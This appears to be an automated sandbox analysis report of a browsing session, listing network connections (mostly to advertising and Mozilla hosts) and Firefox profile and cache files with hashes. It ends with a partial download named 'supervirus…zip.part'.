| US | 8.8.8.8:53 | ssc.33across.com | udp |
| US | 8.8.8.8:53 | prebid.media.net | udp |
| US | 8.8.8.8:53 | tagged-by.rubiconproject.net.akadns.net | udp |
| NL | 178.250.1.8:443 | bidder.criteo.com | tcp |
| DE | 18.196.187.137:443 | btlr.sharethrough.com | tcp |
| DE | 18.196.187.137:443 | btlr.sharethrough.com | tcp |
| US | 8.8.8.8:53 | iad-2-apex.go.sonobi.com | udp |
| US | 8.8.8.8:53 | eu-tlx.3lift.com | udp |
| US | 104.18.36.155:443 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | tag.1rx.io | udp |
| US | 8.8.8.8:53 | iad-2-apex.go.sonobi.com | udp |
| US | 8.8.8.8:53 | eu-tlx.3lift.com | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | tag.1rx.io | udp |
| US | 34.120.63.153:443 | prebid.media.net | udp |
| US | 34.149.20.76:443 | ssc.33across.com | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | e9957.b.akamaiedge.net | udp |
| NL | 46.228.174.115:443 | tag.1rx.io | tcp |
| US | 8.8.8.8:53 | bidder.nl3.vip.prod.criteo.com | udp |
| US | 8.8.8.8:53 | btlr-eu-central-1.sharethrough.com | udp |
| US | 8.8.8.8:53 | e9957.b.akamaiedge.net | udp |
| US | 8.8.8.8:53 | bidder.nl3.vip.prod.criteo.com | udp |
| US | 8.8.8.8:53 | btlr-eu-central-1.sharethrough.com | udp |
| US | 35.227.252.103:443 | rtb.openx.net | udp |
| NL | 46.228.174.115:443 | tag.1rx.io | tcp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | secure.cdn.fastclick.net | udp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | linode-api.eu-west.proximic.com | udp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | e4536.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | d1jvc9b8z3vcjs.cloudfront.net | udp |
| US | 8.8.8.8:53 | linode-api.eu-west.proximic.com | udp |
| US | 8.8.8.8:53 | 155.36.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.217.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.63.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.20.149.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.174.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.108.125.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.252.227.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.64.124.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.187.196.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | e4536.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | d1jvc9b8z3vcjs.cloudfront.net | udp |
| US | 8.8.8.8:53 | eb.proper.io | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 8.8.8.8:53 | ad.360yield.com | udp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| GB | 108.156.46.103:443 | eb.proper.io | tcp |
| US | 8.8.8.8:53 | eb.proper.io | udp |
| DE | 51.75.86.98:443 | onetag-sys.com | tcp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | eb.proper.io | udp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | euw-ice.360yield.com | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 8.8.8.8:53 | euw-ice.360yield.com | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| DE | 51.75.86.98:443 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | static.nl3.vip.prod.criteo.net | udp |
| US | 8.8.8.8:53 | a1d05cb01e45e6e5d0f6599a17b43eac.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | static.nl3.vip.prod.criteo.net | udp |
| GB | 172.217.169.65:443 | a1d05cb01e45e6e5d0f6599a17b43eac.safeframe.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | pagead-googlehosted.l.google.com | udp |
| US | 8.8.8.8:53 | pagead-googlehosted.l.google.com | udp |
| GB | 172.217.169.65:443 | pagead-googlehosted.l.google.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 67.220.224.144:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | 232.154.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.46.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.86.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.224.220.67.in-addr.arpa | udp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| IE | 54.154.21.218:443 | euw-ice.360yield.com | tcp |
| US | 104.18.36.155:443 | ssum-sec.casalemedia.com | tcp |
| NL | 178.250.1.3:443 | static.nl3.vip.prod.criteo.net | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| US | 104.18.36.155:443 | ssum-sec.casalemedia.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| NL | 178.250.1.3:443 | static.nl3.vip.prod.criteo.net | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | gum.nl3.vip.prod.criteo.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | gum.nl3.vip.prod.criteo.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 8.8.8.8:53 | ag.gbc.criteo.com | udp |
| US | 8.8.8.8:53 | gem.gbc.criteo.com | udp |
| NL | 178.250.1.11:443 | dnacdn.net | tcp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 8.8.8.8:53 | gbc4.fr3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | gbc2.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 8.8.8.8:53 | gbc2.nl3.eu.criteo.com | udp |
| FR | 185.235.86.119:443 | gbc4.fr3.eu.criteo.com | tcp |
| NL | 185.235.87.83:443 | gbc2.nl3.eu.criteo.com | tcp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.174.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.21.154.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bids.proper.io | udp |
| US | 52.32.42.129:443 | bids.proper.io | tcp |
| US | 8.8.8.8:53 | 119.86.235.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.87.235.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.enthusiastgaming.net | udp |
| GB | 18.244.179.40:443 | api.enthusiastgaming.net | tcp |
| US | 8.8.8.8:53 | api.enthusiastgaming.net | udp |
| US | 8.8.8.8:53 | api.enthusiastgaming.net | udp |
| US | 8.8.8.8:53 | vplayer.enthusiastgaming.com | udp |
| GB | 13.224.222.122:443 | vplayer.enthusiastgaming.com | tcp |
| US | 8.8.8.8:53 | d25rcu0ocutfu6.cloudfront.net | udp |
| US | 8.8.8.8:53 | d25rcu0ocutfu6.cloudfront.net | udp |
| US | 8.8.8.8:53 | eu-tlx.3lift.com | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| NL | 46.228.174.115:443 | tag.1rx.io | tcp |
| GB | 13.224.222.122:443 | d25rcu0ocutfu6.cloudfront.net | udp |
| US | 69.166.1.9:443 | iad-2-apex.go.sonobi.com | tcp |
| US | 8.8.8.8:53 | hbopenbid-lhrc.pubmnet.com | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 8.8.8.8:53 | targeting.unrulymedia.com | udp |
| US | 8.8.8.8:53 | ced.sascdn.com | udp |
| US | 8.8.8.8:53 | cmp.inmobi.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| NL | 46.228.174.115:443 | targeting.unrulymedia.com | tcp |
| US | 8.8.8.8:53 | a1184.b.akamai.net | udp |
| US | 104.22.75.216:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | btloader.com | udp |
| FR | 99.86.91.98:443 | tagan.adlightning.com | tcp |
| US | 8.8.8.8:53 | 40.179.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.222.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pghub.io | udp |
| US | 8.8.8.8:53 | a1184.b.akamai.net | udp |
| US | 35.241.45.217:443 | pghub.io | tcp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | d23sp3kzv1t6m5.cloudfront.net | udp |
| US | 8.8.8.8:53 | tagan.adlightning.com | udp |
| US | 8.8.8.8:53 | pghub.io | udp |
| US | 8.8.8.8:53 | tagan.adlightning.com | udp |
| US | 8.8.8.8:53 | pghub.io | udp |
| US | 35.241.45.217:443 | pghub.io | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 104.22.75.216:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 104.22.75.216:443 | btloader.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | tcp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | aus5.mozilla.org | udp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | 216.75.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.91.86.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.45.241.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.23.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 35.244.181.201:443 | aus5.mozilla.org | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | eus.rubiconproject.com | udp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | acdn.adnxs.com | udp |
| US | 8.8.8.8:53 | eb2.3lift.com | udp |
| US | 8.8.8.8:53 | propermedia-d.openx.net | udp |
| US | 35.244.159.8:443 | propermedia-d.openx.net | tcp |
| US | 8.8.8.8:53 | propermedia-d.openx.net | udp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 8.8.8.8:53 | eu-eb2.3lift.com | udp |
| SE | 23.34.232.182:443 | acdn.adnxs.com | tcp |
| US | 8.8.8.8:53 | e6115.g.akamaiedge.net | udp |
| SE | 23.34.232.193:443 | ads.pubmatic.com | tcp |
| BE | 23.55.98.169:443 | eus.rubiconproject.com | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| BE | 23.14.90.90:443 | a1184.b.akamai.net | tcp |
| GB | 18.244.114.102:443 | cmp.inmobi.com | tcp |
| FR | 13.249.9.34:443 | sb.scorecardresearch.com | tcp |
| US | 8.8.8.8:53 | propermedia-d.openx.net | udp |
| US | 8.8.8.8:53 | eu-eb2.3lift.com | udp |
| US | 8.8.8.8:53 | e6115.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | e6603.g.akamaiedge.net | udp |
| US | 35.244.159.8:443 | propermedia-d.openx.net | udp |
| US | 8.8.8.8:53 | e8960.b.akamaiedge.net | udp |
| US | 8.8.8.8:53 | e8960.b.akamaiedge.net | udp |
| US | 8.8.8.8:53 | e6603.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.net.akadns.net | tcp |
| DE | 23.53.40.113:80 | ciscobinary.openh264.org | tcp |
Files
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\activity-stream.discovery_stream.json.tmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs.js
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs-1.js
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\storage\default\https+++gamejolt.com\idb\3619099707vealluiddoamt-es-cbir.sqlite
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs-1.js
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\C941DBD419649B820658FDCD20C966BAC6540424
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\5853
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\9130
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\B10CBB07FCEAA610B2E08CD9843D3A8F3CECB4E3
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\A08924EC62F23B2A3227D275793EA6FEE14E4F7A
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\0A5377974291A0ACE3211C425E01453EDCC874FB
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\9386C514C8CF0708B75C1823E477F15CD63E488F
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\7110
| MD5 | a2a1e96eb1ca631f758fd94603f2445a |
| SHA1 | 8bdbb0185bd686dcdfbdddcfcd6195b0615a61eb |
| SHA256 | 3c704b036c97c9a3af6c88b7a29a576a6bb2733b181584456714c0c6a3775717 |
| SHA512 | d43f2984cd8b1d4a2f57fd29cfdd91a90d211b99901c2ed73967715dd2575daa21cddf1d641d63fc936f23063e4e9a70ae9a74d0f472cf3d50484c60ccbd0b15 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\BD0F18EDE634CA65226CFA2E3385FF4D77EBEE23
| MD5 | e3d96fb793952b47e6066359d3b08a4b |
| SHA1 | 80e02b684af3929fa7eebc0856efa200e6941ef1 |
| SHA256 | b4a700464bb26177af05ca1a1d52c39401dd03620017f8e3fa4455ee8d81bbbe |
| SHA512 | 4d696935a19a65d98fbce52ac808129146e983354fc43e4a4d614fe580f01b91969423d4a890d2bb23ee03b7641a60dc67d03027919219aaf723cccabc2c7fee |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\30824
| MD5 | 23d3ceac02147cd15b82de10f3bc15b8 |
| SHA1 | 3d7f4d12cb387f93f3f83ab34476701409905379 |
| SHA256 | eb7a4c378ab4b82f1fd560c1efd1b37b6f6e7151086dea281bd5d1c4bce40e11 |
| SHA512 | 608443c9cc6a9e221fb7297dea65c2252ff0bd8b1627b8c30606126d5d78093853b219916a3441ceb24ffd82c4a6221f3c7750dba6d6923edfaf6603fadf016a |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\30724
| MD5 | bdb87c888f878e2a289f88a78deb2621 |
| SHA1 | 26abbcd946596b587b21d3715b130c6542bcc221 |
| SHA256 | 54a78f25e62e133f2a9bda79673f6c1a1864fc9a2fab1610925cad9a9187f4ca |
| SHA512 | c3642e30538c8f547fe7c5a9651615fa6649812970805ecac9bdf26f5f1231953a6ec1970009ead8a50e18179c83d84c131c99686e3af07513f555bb1e5995af |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\24970
| MD5 | 15f7d25ccea9297bd4a5625ccbfdcb15 |
| SHA1 | 65f39ad619b074db593b98c1d9e70e4e981a4991 |
| SHA256 | 34799731ed8e1db5e5f8ae0856bbb40e90433d363525d74e3fa6b543a4ddd474 |
| SHA512 | baf8727282bef4431929d1057d714eed562d8a98a9a3be8cbcdfb637885101aae015193b91022e2c91ac866e1aeec5cb136ee5b7fcd73d4d5e7b3ed2a2a7d24b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs-1.js
| MD5 | bfbf39db2124dbacf55a580cf73631bd |
| SHA1 | 09d4051b4ee069a9ae599866d722ac4dd2327fa2 |
| SHA256 | 175395af9614271bba6a84d2714f02c80b19790de23a950e4667f2032b19bb03 |
| SHA512 | 47f95f5f057f23d7c00b7acbe09106a8b2f48d9eea5e878c15b95f53a6fa920d7a0632efa5acaca7bf6b7dffe8a86d8d39e6dbca35e2e003e3c45b4f65ab1b4b |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\8B1905E77949FF7F0809A55B15A5B04670080E70
| MD5 | 4486ea097062f631ca7eb1a8c11eaccd |
| SHA1 | cf010e6b11306c01a6c951c32981475c328d3fc3 |
| SHA256 | 2d0d35fbea3ae1b5845f671bbd4f294c089ddb06f734bf61ad46a81ca66eb678 |
| SHA512 | 12443f6fe0828a6b9181da6a5b3a679a5b528e1e43a631187f250035c83b9d8bd50cb267716be4fdb4a285cb1a9d7303a9067c60290720490d183efbc6d2b516 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
| MD5 | 3d33cdc0b3d281e67dd52e14435dd04f |
| SHA1 | 4db88689282fd4f9e9e6ab95fcbb23df6e6485db |
| SHA256 | f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b |
| SHA512 | a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
| MD5 | fe3355639648c417e8307c6d051e3e37 |
| SHA1 | f54602d4b4778da21bc97c7238fc66aa68c8ee34 |
| SHA256 | 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e |
| SHA512 | 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 85430baed3398695717b0263807cf97c |
| SHA1 | fffbee923cea216f50fce5d54219a188a5100f41 |
| SHA256 | a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e |
| SHA512 | 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\94998847A92A9F838DC313AC0E131747BFDC8109
| MD5 | 8657aaf071d9a3087ea5a306d4faeea8 |
| SHA1 | a4045b4633579ec4434bdd59ce35019d20f13951 |
| SHA256 | cba698878eb67cfc023382b91d31734e3ffb62ef402dfbf3c9d17036b0400a14 |
| SHA512 | 51a0d78a202a2b282f34aa1792c3c699d1c3267dc3fbd1dea9d3b5ef8316c6e8dbebdf0f13a796155ea188385819664a8b2c95335e636152de30312bd22fc558 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\15458
| MD5 | 411ecab164aaca8446d2f0a5bace9b5e |
| SHA1 | 9d2a60fb0e1cec1e85b38a9eab24a7c5a3bbb323 |
| SHA256 | 8d13a658c13a03682fe1ada9e92eb5ab3ba9004516fb871222a73ce5cd3cae84 |
| SHA512 | b7be2500f7654f0daf90050da0494c2f85b65ffbf4e0d0253d994cc228082dd6a91531bedd2567c061dca8c49673fff88f0f1c4efd3573dbb5144d67577bf2ca |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\7AD030DE8DBCD00C8202B93033C0AAF9BA50CA8A
| MD5 | b5f83dc9a2bc7ac2ee11b5e79159f18a |
| SHA1 | d50a57ef5d51ff1bf8afc0db8febeaeaba4228de |
| SHA256 | 305b729f3dddea616959ba079eab1905f1003371f890bd12b8828b6bf6ae0e7f |
| SHA512 | 9f60af59fe4c83beb7065068eb406b786cd4d22ae093ae0e8c8231d4201c6479c765d27a388ef3f7478a53c5b1995f69f8b4c48401909fea38887067d1395f4e |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | a01c5ecd6108350ae23d2cddf0e77c17 |
| SHA1 | c6ac28a2cd979f1f9a75d56271821d5ff665e2b6 |
| SHA256 | 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42 |
| SHA512 | b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
| MD5 | 937326fead5fd401f6cca9118bd9ade9 |
| SHA1 | 4526a57d4ae14ed29b37632c72aef3c408189d91 |
| SHA256 | 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81 |
| SHA512 | b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
| MD5 | 688bed3676d2104e7f17ae1cd2c59404 |
| SHA1 | 952b2cdf783ac72fcb98338723e9afd38d47ad8e |
| SHA256 | 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237 |
| SHA512 | 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
| MD5 | 33bf7b0439480effb9fb212efce87b13 |
| SHA1 | cee50f2745edc6dc291887b6075ca64d716f495a |
| SHA256 | 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e |
| SHA512 | d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
| MD5 | 8be33af717bb1b67fbd61c3f4b807e9e |
| SHA1 | 7cf17656d174d951957ff36810e874a134dd49e0 |
| SHA256 | e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd |
| SHA512 | 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
| MD5 | 49ddb419d96dceb9069018535fb2e2fc |
| SHA1 | 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6 |
| SHA256 | 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539 |
| SHA512 | 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\12757
| MD5 | d2df54ae8435e7812cb94b0e6eeffad6 |
| SHA1 | 3d705ca0dbfbcc1e6b03666b356f9f528e15dfdb |
| SHA256 | 301e70a0eb95cd4f4fed678e76719e3c00c54d08c74952a7bff466f9dc497058 |
| SHA512 | fb3c464ca6e0d73a4a96914d688b854b8ab0630cfbcd0dabae62ec71388c60195189b46506e49a627221aa42e2913a0c3c5fc6bdcab343cb42e6d894f108805a |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\513EF9647CC170C0340E85A19567EC546F93C6BA
| MD5 | b8e1efda543e2450fdcce16bfafbdb62 |
| SHA1 | 7ce66fc29b879f7f8bc7a5217f9392a1e2f61553 |
| SHA256 | 8dd58ec2c8aaa22a855412f3c54b976f986f11c99b8b67e5c6b32d4b2f9653a0 |
| SHA512 | 1deae8e3ceddb555cdf2808c5f483ab6876e88ae02f063621d367281450d149b84266a31ec14c230355eadfb1ad6e76b715cfed225ebdf72615c86a4541a3c42 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | fd4085c72db721c872a09d74232f6b26 |
| SHA1 | 64dd3cbe3b7c019023e94742e0615739f722dc9d |
| SHA256 | 2fecac1ae59598decd0b928cd34017acb833b7e6be758d7bf663b6dacbba3c1f |
| SHA512 | a1256dd954ba62a025867643b99e3f53b0047af4e7cf019f00a71c2b7c0b754e28e93bf522bd80dc89e77884d10964e3b31ba91936a551e293ca142ec7eb98b1 |
C:\Users\Admin\Downloads\supervirus.0m0wYdWT.zip.part
| MD5 | 426ff666b84f19c11b78bc89ce233362 |
| SHA1 | 9971d71239b7ceab1c1553a437fab5442ea05df3 |
| SHA256 | c81cd237399790fbe008343a0defd701428bbdf072e17304e2e6179d701f01e0 |
| SHA512 | 1cffab7e3f7f78132d4ad9ff158ce4e704b60393a2c2e20ad00694df6845bfa6bad188384cac8a275964131e5f0e75aab19edc403f4f43f98403bac6875a8ebd |
